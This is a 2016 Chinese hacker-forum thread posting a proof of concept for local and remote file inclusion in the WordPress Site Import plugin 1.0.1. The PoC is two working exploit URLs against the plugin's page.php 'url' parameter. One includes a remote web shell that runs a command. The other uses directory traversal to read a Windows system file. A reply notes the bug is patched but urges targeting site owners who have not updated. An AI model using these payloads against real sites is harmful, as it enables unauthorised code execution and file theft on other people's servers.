红客联盟 - 由08安全团队运营

红客联盟 - 由08安全团队运营»社区首页 › 技术攻防 › 漏洞情报 › Wordpress Site Import Plugin 1.0.1本地和远程文件包含 ...

返回列表发帖

查看: 15563|回复: 1

Wordpress Site Import Plugin 1.0.1本地和远程文件包含漏洞

发表于 2016-3-15 10:02:27 | 显示全部楼层 |阅读模式

[PoC]

[PHP] 纯文本查看 复制代码

======================================
远程文件包含 == http://localhost/wordpress/wp-content/plugins/site-import/admin/page.php?url=http%3a%2f%2flocalhost%2fshell.php?shell=ls
本地文件包含 == http://localhost/wordpress/wp-content/plugins/site-import/admin/page.php?url=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
=================================

Wordpress漏洞

相关帖子

回复

使用道具举报

发表于 2016-3-15 20:54:13 | 显示全部楼层

这个漏洞还是挺有效的，不过貌似这个插件最新版本已经修补了。
不过可以去纠结一下还没有升级的站长

回复支持反对

使用道具举报

返回列表发帖

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

应急响应中心

联系我们

官方QQ群：112851260

官方邮箱：security#ihonker.org（#改成@）

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-9-18 00:26 , Processed in 0.026702 second(s), 21 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

返回顶部